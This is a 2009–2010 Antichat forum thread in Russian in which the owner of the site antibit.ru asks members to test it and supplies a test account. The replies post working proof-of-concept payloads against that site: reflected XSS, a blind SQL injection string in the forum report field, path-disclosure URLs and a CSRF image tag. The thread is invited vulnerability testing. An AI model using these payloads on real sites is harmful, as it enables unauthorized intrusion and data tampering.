ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

ВАП сайт. Нужна проверка.
  #1  
Старый 14.11.2009, 00:37
Аватар для azote
azote
Новичок
Регистрация: 28.03.2008
Сообщений: 24
Провел на форуме:
52770

Репутация: -5
Question ВАП сайт. Нужна проверка.

Cайт antibit.ru
Проверьте пожалуйста, тем кто чем-нибудь поможет, буду очень и весьма признателен.
Картинка ачата стоит.

Тестовый Аккаунт:
login: antichat
pass: antichat


Хотелось бы проверить:


http://antibit.ru/forum/ (особенно при добавлении файла в тему)
http://antibit.ru/add/
http://antibit.ru/kontakts/
http://antibit.ru/ignors/
http://antibit.ru/files

Последний раз редактировалось azote; 28.05.2010 в 16:57..
 
Ответить с цитированием

  #2  
Старый 14.11.2009, 15:25
Аватар для S00pY
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

antibit.ru/index.php?do=files&name[]=Din
раскрытие пути
------------------
index.php?do=files&name=Din
пасив xss в поиске
 
Ответить с цитированием

  #3  
Старый 22.12.2009, 21:48
Аватар для azote
azote
Новичок
Регистрация: 28.03.2008
Сообщений: 24
Провел на форуме:
52770

Репутация: -5
По умолчанию

Акутально. Картинка ачата стоит. Тестовый акк дал. В шапке указал модули которые хотелось бы проверить.

Последний раз редактировалось azote; 23.12.2009 в 21:43..
 
Ответить с цитированием

  #4  
Старый 23.12.2009, 01:20
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

http://antibit.ru/index.php?do=members&orderby[]=warn_up
 
Ответить с цитированием

  #5  
Старый 03.01.2010, 18:54
Аватар для SnooPy
SnooPy
Новичок
Регистрация: 16.12.2009
Сообщений: 18
Провел на форуме:
92411

Репутация: 3
По умолчанию

http://antibit.ru/members/ в поиске кавычку отфильтруй!
 
Ответить с цитированием

  #6  
Старый 22.04.2010, 23:35
Аватар для azote
azote
Новичок
Регистрация: 28.03.2008
Сообщений: 24
Провел на форуме:
52770

Репутация: -5
По умолчанию

Хотелось бы првоерить:

http://antibit.ru/forum/
http://antibit.ru/members/
http://antibit.ru/kontakts/
http://antibit.ru/ignors/
 
Ответить с цитированием

SQL
  #7  
Старый 23.04.2010, 04:57
Аватар для life_glider
life_glider
Познающий
Регистрация: 13.04.2010
Сообщений: 42
Провел на форуме:
460968

Репутация: 81
Thumbs up SQL

SQL-injection в insert-е, вроде как слепая.
Уязвимо поле причина жалобы в форуме когда нажимаем пожаловаться.
http://antibit.ru/forum/topic_101/report/2
вставил
123','123338', 'system', '1271983556', 'no', VERSION())/*
прошло
123','123338', 'system', '1271983556', 'no', VERSION()')/*
обана
PHP код:
INSERT INTO dle_pm (subjtextuseruser_fromdatepm_readfoldervalues ('Жалоба на сообщение форума.''Данную жалобу вам отправил antichat<br>
Текст жалобы: 123'
,'123338''system''1271983556''no'VERSION()')/*<br>
Тема: <a href="http://antibit.ru/index.php?do=forum&showtopic=255">Перейти в тему</a><br>
ID сообщения: 2'
338'system''1271983702''no''inbox'
Раскрытие путей:
PHP код:
Warningsocket_write(): 21 is not a valid Socket resource in /home/a/antibitru/public_html/engine/classes/icq.class.php on line 239 Warningsocket_close(): 21 is not a valid Socket resource in /home/a/antibitru/public_html/engine/classes/icq.class.php on line 294 
http://antibit.ru/icq_send/send/359
CSRF:
Добавляем В ИГНОР:
<img src="http://antibit.ru/ignors/add/358" alt="" />

Последний раз редактировалось life_glider; 23.04.2010 в 20:30..
 
Ответить с цитированием

  #8  
Старый 28.05.2010, 16:57
Аватар для azote
azote
Новичок
Регистрация: 28.03.2008
Сообщений: 24
Провел на форуме:
52770

Репутация: -5
По умолчанию

Обновил шапку, проверьте пожалуйста.
 
Ответить с цитированием

  #9  
Старый 15.11.2009, 02:21
Аватар для XenkoK
XenkoK
Новичок
Регистрация: 23.12.2008
Сообщений: 18
Провел на форуме:
311387

Репутация: 7
Отправить сообщение для XenkoK с помощью ICQ
По умолчанию

Цитата:
Сообщение от azote  
Cпасибо, убрал.


А можно поподробней узнать где тут Хss ?

гг перейди: http://antibit.ru/index.php?do=files&name=Din

и в поиске напишы: "><script>alert()</script>

Последний раз редактировалось XenkoK; 15.11.2009 в 02:23..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Регеры ICQ UIN'ов by saiNT sai_NT ICQ 477 13.06.2010 17:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ